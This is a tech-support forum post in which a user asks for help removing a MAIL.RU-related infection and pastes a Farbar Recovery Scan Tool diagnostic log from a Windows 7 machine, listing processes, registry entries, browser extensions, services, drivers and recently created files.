Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Another MAIL.RU victim here....


  • This topic is locked This topic is locked
8 replies to this topic

#1 Xaltotun

Xaltotun

  • Members
  • 4 posts
  • OFFLINE
  •  
  • Local time:07:32 PM

Posted 11 January 2018 - 03:11 AM

Hi, my name is Silver, and i have similar problem, as some people have been here before. Got MAIL.RU with CMD download and blue creen on turnoff sometimes..  Only difference is that i used Malware bytes and Zemana for scan and they destroyed some of it. Cmd download and blue screen on shutdown stayed. then i was at work 24h, when came back Avast found something (818424698.exe and trz2EAD.tmp) and chested those...  So far CMD havent pop up.. Can you please chek are im now good here :)

 

 

Presenting FRST results here :)

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 02.01.2018
Ran by Jahikas (administrator) on JAHIKAS-REAKTOR (11-01-2018 09:42:46)
Running from C:\Users\Jahikas\Desktop\FRST
Loaded Profiles: Jahikas & UpdatusUser (Available Profiles: Jahikas & UpdatusUser)
Platform: Windows 7 Ultimate Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Copyright 2017.) C:\Program Files (x86)\Zemana AntiMalware\ZAM.exe
(Microsoft Corporation) C:\Program Files\Windows Sidebar\sidebar.exe
(Power Software Ltd) C:\Program Files\PowerISO\PWRISOVM.EXE
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
() C:\Windows\runSW.exe
(Realtek) C:\Windows\SwUSB.exe
(Copyright 2017.) C:\Program Files (x86)\Zemana AntiMalware\ZAM.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
() C:\Program Files (x86)\The4ThComing\t4c.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [287592 2013-08-07] (Intel Corporation)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [12503184 2012-06-11] (Realtek Semiconductor)
HKLM\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvLaunch.exe [246120 2017-12-22] (AVAST Software)
HKLM\...\Run: [ZAM] => C:\Program Files (x86)\Zemana AntiMalware\ZAM.exe [15775888 2017-08-09] (Copyright 2017.)
HKLM-x32\...\Run: [PWRISOVM.EXE] => C:\Program Files\PowerISO\PWRISOVM.EXE [465544 2016-02-10] (Power Software Ltd)
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [291608 2012-03-27] (Intel Corporation)
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-1345210596-781569937-2744199837-1000\...\MountPoints2: F - F:\AutoRunMorrowind.exe
HKU\S-1-5-21-1345210596-781569937-2744199837-1000\...\MountPoints2: G - G:\setup.exe
AppInit_DLLs: C:\Windows\Jaksta\AC\x64\jaudcap.dll => C:\Windows\Jaksta\AC\x64\jaudcap.dll [312096 2015-04-24] (Jaksta Technologies Pty Ltd)
AppInit_DLLs-x32: C:\Windows\Jaksta\AC\x86\jaudcap.dll => C:\Windows\Jaksta\AC\x86\jaudcap.dll [264992 2015-04-24] (Jaksta Technologies Pty Ltd)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{B03D2702-3AFB-4761-9FEE-8B3C0B97B21A}: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{C222D609-84F4-4AFC-AEB9-A778F23A68BD}: [DhcpNameServer] 192.168.42.129

Internet Explorer:
==================
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.com/?bcutc=sp-006
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxps://www.google.com/search?bcutc=sp-006&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKU\S-1-5-21-1345210596-781569937-2744199837-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://www.google.com/search?bcutc=sp-006&q={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?bcutc=sp-006&q={searchTerms}
SearchScopes: HKLM-x32 -> {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?bcutc=sp-006&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1345210596-781569937-2744199837-1000 -> DefaultScope {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?bcutc=sp-006&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1345210596-781569937-2744199837-1000 -> {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?bcutc=sp-006&q={searchTerms}
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2017-11-09] (AVAST Software)
BHO-x32: IE Token Signing Plugin -> {2A4E94A4-B275-491A-9E32-CD7A26FC7C3B} -> C:\Program Files\Open-EID\esteid-plugin-ie.dll [2017-10-16] (RIA)
BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2017-11-09] (AVAST Software)

FireFox:
========
FF DefaultProfile: krkz2nio.default-1500317088253
FF ProfilePath: C:\Users\Jahikas\AppData\Roaming\Mozilla\Firefox\Profiles\krkz2nio.default-1500317088253 [2018-01-11]
FF user.js: detected! => C:\Users\Jahikas\AppData\Roaming\Mozilla\Firefox\Profiles\krkz2nio.default-1500317088253\user.js [2014-05-14]
FF Homepage: Mozilla\Firefox\Profiles\krkz2nio.default-1500317088253 -> about:home
FF NetworkProxy: Mozilla\Firefox\Profiles\krkz2nio.default-1500317088253 -> type", 0
FF Session Restore: Mozilla\Firefox\Profiles\krkz2nio.default-1500317088253 -> is enabled.
FF Extension: (Yahoo) - C:\Users\Jahikas\AppData\Roaming\Mozilla\Firefox\Profiles\krkz2nio.default-1500317088253\Extensions\@yset.xpi [2017-10-31]
FF Extension: (Ant Video downloader) - C:\Users\Jahikas\AppData\Roaming\Mozilla\Firefox\Profiles\krkz2nio.default-1500317088253\Extensions\anttoolbar@ant.com.xpi [2018-01-05]
FF Extension: (NetVideoHunter) - C:\Users\Jahikas\AppData\Roaming\Mozilla\Firefox\Profiles\krkz2nio.default-1500317088253\Extensions\netvideohunter@netvideohunter.com [2017-07-17] [Legacy]
FF Extension: (The Addon Bar (restored)) - C:\Users\Jahikas\AppData\Roaming\Mozilla\Firefox\Profiles\krkz2nio.default-1500317088253\Extensions\the-addon-bar@GeekInTraining-GiT.xpi [2016-05-04] [Legacy]
FF Extension: (Adblock Plus) - C:\Users\Jahikas\AppData\Roaming\Mozilla\Firefox\Profiles\krkz2nio.default-1500317088253\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2017-12-13]
FF Extension: (SearchPreview) - C:\Users\Jahikas\AppData\Roaming\Mozilla\Firefox\Profiles\krkz2nio.default-1500317088253\Extensions\{EF522540-89F5-46b9-B6FE-1829E2B572C6}.xpi [2017-08-24]
FF HKLM\...\Firefox\Extensions: [{443830f0-1fff-4f9a-aa1e-444bafbc7319}] - C:\Program Files (x86)\Open-EID\\{443830f0-1fff-4f9a-aa1e-444bafbc7319}.xpi
FF Extension: (Token signing) - C:\Program Files (x86)\Open-EID\\{443830f0-1fff-4f9a-aa1e-444bafbc7319}.xpi [2017-10-16]
FF HKLM\...\Firefox\Extensions: [{aa84ce40-4253-a00a-8cd6-0800200f9a67}] - C:\Program Files\Open-EID\\{aa84ce40-4253-a00a-8cd6-0800200f9a67}.xpi
FF Extension: (PKCS11 loader) - C:\Program Files\Open-EID\\{aa84ce40-4253-a00a-8cd6-0800200f9a67}.xpi [2017-10-04] [Legacy]
FF HKLM-x32\...\Firefox\Extensions: [{443830f0-1fff-4f9a-aa1e-444bafbc7319}] - C:\Program Files (x86)\Open-EID\\{443830f0-1fff-4f9a-aa1e-444bafbc7319}.xpi
FF HKLM-x32\...\Firefox\Extensions: [{aa84ce40-4253-a00a-8cd6-0800200f9a67}] - C:\Program Files\Open-EID\\{aa84ce40-4253-a00a-8cd6-0800200f9a67}.xpi
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_28_0_0_137.dll [2018-01-09] ()
FF Plugin: @videolan.org/vlc,version=2.2.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2017-11-29] (VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.2.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2017-11-29] (VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.2.8 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2017-11-29] (VideoLAN)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_28_0_0_137.dll [2018-01-09] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-09-16] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-09-16] (Intel Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2012-10-02] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2012-10-02] (NVIDIA Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2017-11-04] (Adobe Systems Inc.)

Chrome:
=======
CHR HKU\S-1-5-21-1345210596-781569937-2744199837-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [hegneaniplmfjcmohoclabblbahcbjoe] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [ckjefchnfjhjfedoccjbhjpbncimppeg] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [hegneaniplmfjcmohoclabblbahcbjoe] - hxxp://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 aswbIDSAgent; C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe [7538536 2017-12-22] (AVAST Software)
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [301168 2017-12-22] (AVAST Software)
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [15720 2013-08-07] (Intel Corporation)
R2 Intel® Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel® Corporation) [File not signed]
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel® Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [169432 2013-09-16] (Intel Corporation)
S3 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6234056 2017-11-01] (Malwarebytes)
R2 RunSwUSB; C:\Windows\runSW.exe [44760 2014-12-12] ()
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2016-06-12] (Microsoft Corporation)
R2 ZAMSvc; C:\Program Files (x86)\Zemana AntiMalware\ZAM.exe [15775888 2017-08-09] (Copyright 2017.)
S2 RTLDHCPService; C:\Program Files (x86)\Realtek\USB Wireless LAN Utility\RTLDHCP.exe [X]

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 appliand; C:\Windows\System32\DRIVERS\appliand.sys [30304 2014-11-28] (Applian Technologies Inc.)
R1 aswArPot; C:\Windows\System32\drivers\aswArPot.sys [185096 2017-12-22] (AVAST Software)
R1 aswbidsdriver; C:\Windows\System32\drivers\aswbidsdrivera.sys [321512 2017-12-22] (AVAST Software)
R0 aswbidsh; C:\Windows\System32\drivers\aswbidsha.sys [199448 2017-12-22] (AVAST Software)
R0 aswblog; C:\Windows\System32\drivers\aswbloga.sys [343768 2017-12-22] (AVAST Software)
R0 aswbuniv; C:\Windows\System32\drivers\aswbuniva.sys [57696 2017-12-22] (AVAST Software)
R1 aswHdsKe; C:\Windows\System32\drivers\aswHdsKe.sys [149344 2017-12-22] (AVAST Software)
S3 aswHwid; C:\Windows\System32\drivers\aswHwid.sys [46976 2017-12-22] (AVAST Software)
R2 aswMonFlt; C:\Windows\System32\drivers\aswMonFlt.sys [146648 2018-01-10] (AVAST Software)
R1 aswRdr; C:\Windows\System32\drivers\aswRdr2.sys [110336 2017-12-22] (AVAST Software)
R0 aswRvrt; C:\Windows\System32\drivers\aswRvrt.sys [84384 2017-12-22] (AVAST Software)
R1 aswSnx; C:\Windows\System32\drivers\aswSnx.sys [1025176 2017-12-22] (AVAST Software)
R1 aswSP; C:\Windows\System32\drivers\aswSP.sys [457896 2018-01-10] (AVAST Software)
R2 aswStm; C:\Windows\System32\drivers\aswStm.sys [204456 2017-12-22] (AVAST Software)
R0 aswVmm; C:\Windows\System32\drivers\aswVmm.sys [358672 2017-12-22] (AVAST Software)
S3 atrfiltr; C:\Windows\System32\DRIVERS\atrfiltr.sys [24968 2016-03-08] (Windows ® Win 7 DDK provider)
R0 iaStorF; C:\Windows\System32\drivers\iaStorF.sys [28008 2013-08-07] (Intel Corporation)
R3 jakstaVA; C:\Windows\System32\DRIVERS\jaksta_va.sys [103816 2014-12-09] (e2eSoft)
R3 MEIx64; C:\Windows\System32\DRIVERS\TeeDriverx64.sys [99288 2013-09-16] (Intel Corporation)
R3 VUSB3HUB; C:\Windows\System32\DRIVERS\ViaHub3.sys [231112 2013-01-03] (VIA Technologies, Inc.)
R3 xhcdrv; C:\Windows\System32\DRIVERS\xhcdrv.sys [301256 2013-01-03] (VIA Technologies, Inc.)
R1 ZAM; C:\Windows\System32\drivers\zam64.sys [203680 2018-01-10] (Zemana Ltd.)
R1 ZAM_Guard; C:\Windows\System32\drivers\zamguard64.sys [203680 2018-01-10] (Zemana Ltd.)
S3 VGPU; System32\drivers\rdvgkmd.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-01-11 09:42 - 2018-01-11 09:42 - 000000000 ____D C:\Users\Jahikas\Desktop\FRST
2018-01-11 09:42 - 2018-01-11 09:42 - 000000000 ____D C:\FRST
2018-01-11 08:36 - 2018-01-11 08:36 - 000000000 ___HD C:\$AV_ASW
2018-01-11 08:32 - 2018-01-11 08:32 - 000000000 ____D C:\ProgramData\SWCUTemp
2018-01-10 03:37 - 2018-01-11 09:42 - 000059263 _____ C:\Windows\ZAM.krnl.trace
2018-01-10 03:37 - 2018-01-11 09:42 - 000026893 _____ C:\Windows\ZAM_Guard.krnl.trace
2018-01-10 03:37 - 2018-01-10 03:37 - 000203680 _____ (Zemana Ltd.) C:\Windows\system32\Drivers\zamguard64.sys
2018-01-10 03:37 - 2018-01-10 03:37 - 000203680 _____ (Zemana Ltd.) C:\Windows\system32\Drivers\zam64.sys
2018-01-10 03:37 - 2018-01-10 03:37 - 000001148 _____ C:\Users\Public\Desktop\Zemana AntiMalware.lnk
2018-01-10 03:37 - 2018-01-10 03:37 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Zemana AntiMalware
2018-01-10 03:37 - 2018-01-10 03:37 - 000000000 ____D C:\Program Files (x86)\Zemana AntiMalware
2018-01-10 03:35 - 2018-01-10 03:35 - 000000000 ____D C:\Users\Jahikas\AppData\Local\Zemana
2018-01-10 03:30 - 2018-01-10 03:31 - 006625600 _____ (Zemana Ltd. ) C:\Users\Jahikas\Downloads\Zemana.AntiMalware.Setup.exe
2018-01-10 02:59 - 2018-01-10 02:59 - 947798725 _____ C:\Windows\MEMORY.DMP
2018-01-10 02:59 - 2018-01-10 02:59 - 000291528 _____ C:\Windows\Minidump\011018-10389-01.dmp
2018-01-10 01:34 - 2018-01-11 08:35 - 000003478 _____ C:\Windows\System32\Tasks\hYOuioDYluo
2018-01-10 01:34 - 2018-01-10 06:51 - 000003294 _____ C:\Windows\System32\Tasks\SyHTyUPcnUkIY
2018-01-10 01:34 - 2018-01-10 01:34 - 000003616 _____ C:\Windows\System32\Tasks\PSEWDZ
2018-01-10 01:34 - 2018-01-10 01:34 - 000000001 _____ C:\Users\Jahikas\AppData\Local\WMI.ini
2018-01-10 01:34 - 2016-06-12 13:42 - 000073216 _____ (Microsoft Corporation) C:\Users\Jahikas\oFIF.exe
2018-01-10 01:34 - 2010-11-21 05:24 - 000186368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Yugjm.exe
2018-01-10 01:34 - 2009-07-14 03:14 - 000001162 _____ C:\Users\Jahikas\AppData\Roaming\YoEb
2018-01-10 01:34 - 2009-07-14 03:14 - 000001129 _____ C:\Program Files (x86)\HXFiYSAfe
2018-01-10 01:34 - 2009-07-14 03:14 - 000000067 _____ C:\Program Files (x86)\bFmsiuYoOoOvL
2018-01-10 01:34 - 2009-07-14 03:14 - 000000062 _____ C:\Windows\SysWOW64\hicAAmW
2018-01-10 01:33 - 2018-01-10 03:04 - 000000000 ____D C:\Users\Jahikas\Downloads\DiRT Rally [FitGirl Repack]
2018-01-05 20:25 - 2018-01-05 20:25 - 000000000 ____D C:\Users\Jahikas\AppData\Roaming\Ant.com
2017-12-22 09:18 - 2017-12-22 09:18 - 000365680 _____ (AVAST Software) C:\Windows\system32\aswBoot.exe
2017-12-22 09:18 - 2017-12-22 09:18 - 000149344 _____ (AVAST Software) C:\Windows\system32\Drivers\aswHdsKe.sys
2017-12-12 11:45 - 2017-12-12 11:46 - 000000000 ____D C:\Users\Jahikas\Desktop\navigin

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-01-11 09:40 - 2017-07-17 20:43 - 000000000 ____D C:\Program Files\Mozilla Firefox
2018-01-11 08:45 - 2016-11-07 21:51 - 000000871 _____ C:\Users\Public\Desktop\VLC media player.lnk
2018-01-11 08:42 - 2016-11-07 13:43 - 000000000 ____D C:\Users\Jahikas
2018-01-11 08:40 - 2009-07-14 06:45 - 000021072 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2018-01-11 08:40 - 2009-07-14 06:45 - 000021072 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2018-01-11 08:38 - 2016-11-15 22:30 - 000000000 ____D C:\Users\Jahikas\AppData\LocalLow\Mozilla
2018-01-11 08:37 - 2009-07-14 07:13 - 000783114 _____ C:\Windows\system32\PerfStringBackup.INI
2018-01-11 08:37 - 2009-07-14 05:20 - 000000000 ____D C:\Windows\inf
2018-01-11 08:32 - 2016-11-07 21:27 - 000000000 ____D C:\ProgramData\NVIDIA
2018-01-11 08:32 - 2009-07-14 07:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2018-01-10 21:18 - 2016-11-07 18:27 - 000457896 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSP.sys
2018-01-10 21:18 - 2016-11-07 18:27 - 000146648 _____ (AVAST Software) C:\Windows\system32\Drivers\aswMonFlt.sys
2018-01-10 15:21 - 2017-03-18 04:33 - 000004172 _____ C:\Windows\System32\Tasks\Avast Emergency Update
2018-01-10 07:48 - 2016-11-07 21:27 - 000000000 ____D C:\Users\UpdatusUser
2018-01-10 07:12 - 2016-11-09 21:58 - 000000000 ____D C:\Users\Jahikas\AppData\Roaming\uTorrent
2018-01-10 02:59 - 2017-03-27 14:21 - 000000000 ____D C:\Windows\Minidump
2018-01-10 01:37 - 2016-11-07 21:51 - 000000000 ____D C:\Users\Jahikas\AppData\Roaming\vlc
2018-01-10 01:33 - 2009-07-14 05:20 - 000000000 ____D C:\Windows\SysWOW64\GroupPolicy
2018-01-09 14:12 - 2016-11-07 21:59 - 000803328 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2018-01-09 14:12 - 2016-11-07 21:59 - 000144896 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2018-01-09 14:12 - 2016-11-07 21:59 - 000004312 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2018-01-09 14:12 - 2016-11-07 21:59 - 000000000 ____D C:\Windows\SysWOW64\Macromed
2018-01-09 14:12 - 2016-11-07 21:59 - 000000000 ____D C:\Windows\system32\Macromed
2018-01-07 01:39 - 2017-07-11 09:55 - 000007601 _____ C:\Users\Jahikas\AppData\Local\Resmon.ResmonCfg
2018-01-06 19:38 - 2016-11-13 13:03 - 000000000 ____D C:\Users\Jahikas\Downloads\Ant Videos
2018-01-06 16:50 - 2017-07-17 20:43 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2018-01-05 17:27 - 2016-11-07 23:53 - 000000000 ____D C:\Users\Jahikas\Desktop\SX 50
2018-01-05 17:19 - 2016-11-14 16:48 - 000009192 _____ C:\Users\Jahikas\Desktop\SX50  Linnud 2013+2014 +2015.txt
2017-12-27 14:32 - 2016-11-10 19:48 - 000004476 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2017-12-27 14:32 - 2016-11-07 19:07 - 000003904 _____ C:\Windows\System32\Tasks\SafeZone scheduled Autoupdate 1478538427
2017-12-27 14:32 - 2016-11-07 18:27 - 000000000 ____D C:\Windows\System32\Tasks\AVAST Software
2017-12-22 09:18 - 2017-11-09 20:15 - 000185096 _____ (AVAST Software) C:\Windows\system32\Drivers\aswArPot.sys
2017-12-22 09:18 - 2017-03-18 04:33 - 000343768 _____ (AVAST Software) C:\Windows\system32\Drivers\aswbloga.sys
2017-12-22 09:18 - 2017-03-18 04:33 - 000321512 _____ (AVAST Software) C:\Windows\system32\Drivers\aswbidsdrivera.sys
2017-12-22 09:18 - 2017-03-18 04:33 - 000199448 _____ (AVAST Software) C:\Windows\system32\Drivers\aswbidsha.sys
2017-12-22 09:18 - 2017-03-18 04:33 - 000057696 _____ (AVAST Software) C:\Windows\system32\Drivers\aswbuniva.sys
2017-12-22 09:18 - 2016-11-07 18:27 - 001025176 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSnx.sys
2017-12-22 09:18 - 2016-11-07 18:27 - 000358672 _____ (AVAST Software) C:\Windows\system32\Drivers\aswVmm.sys
2017-12-22 09:18 - 2016-11-07 18:27 - 000204456 _____ (AVAST Software) C:\Windows\system32\Drivers\aswStm.sys
2017-12-22 09:18 - 2016-11-07 18:27 - 000110336 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRdr2.sys
2017-12-22 09:18 - 2016-11-07 18:27 - 000084384 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRvrt.sys
2017-12-22 09:18 - 2016-11-07 18:27 - 000046976 _____ (AVAST Software) C:\Windows\system32\Drivers\aswHwid.sys
2017-12-16 11:33 - 2016-11-07 20:53 - 000034292 _____ C:\Users\Jahikas\Desktop\märkmik.txt

==================== Files in the root of some directories =======

2018-01-10 01:34 - 2016-06-12 13:42 - 000073216 _____ (Microsoft Corporation) C:\Users\Jahikas\oFIF.exe
2018-01-10 01:34 - 2009-07-14 03:14 - 000000067 _____ () C:\Program Files (x86)\bFmsiuYoOoOvL
2009-07-14 03:14 - 2009-07-14 03:14 - 000000067 _____ () C:\Program Files (x86)\bFmsiuYoOoOvL.bat
2018-01-10 01:34 - 2009-07-14 03:14 - 000001129 _____ () C:\Program Files (x86)\HXFiYSAfe
2009-07-14 03:14 - 2009-07-14 03:14 - 000001129 _____ () C:\Program Files (x86)\HXFiYSAfe.bat
2018-01-10 01:34 - 2009-07-14 03:14 - 000001162 _____ () C:\Users\Jahikas\AppData\Roaming\YoEb
2009-07-14 03:14 - 2009-07-14 03:14 - 000001162 _____ () C:\Users\Jahikas\AppData\Roaming\YoEb.bat
2017-07-11 09:55 - 2018-01-07 01:39 - 000007601 _____ () C:\Users\Jahikas\AppData\Local\Resmon.ResmonCfg
2018-01-10 01:34 - 2018-01-10 01:34 - 000000001 _____ () C:\Users\Jahikas\AppData\Local\WMI.ini

Some files in TEMP:
====================
2018-01-10 07:49 - 2018-01-10 07:49 - 000388418 ____N (                                                            ) C:\Users\Jahikas\AppData\Local\Temp\1190520533.exe

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2018-01-08 03:15

==================== End of FRST.txt ============================

 

 

 

 

 

 

 

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 02.01.2018
Ran by Jahikas (11-01-2018 09:43:03)
Running from C:\Users\Jahikas\Desktop\FRST
Windows 7 Ultimate Service Pack 1 (X64) (2016-11-07 11:42:41)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-1345210596-781569937-2744199837-500 - Administrator - Disabled)
Guest (S-1-5-21-1345210596-781569937-2744199837-501 - Limited - Disabled)
Jahikas (S-1-5-21-1345210596-781569937-2744199837-1000 - Administrator - Enabled) => C:\Users\Jahikas
UpdatusUser (S-1-5-21-1345210596-781569937-2744199837-1001 - Limited - Enabled) => C:\Users\UpdatusUser

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Avast Antivirus (Enabled - Up to date) {8EA8924E-BC81-DC44-8BB0-8BAE75D86EBF}
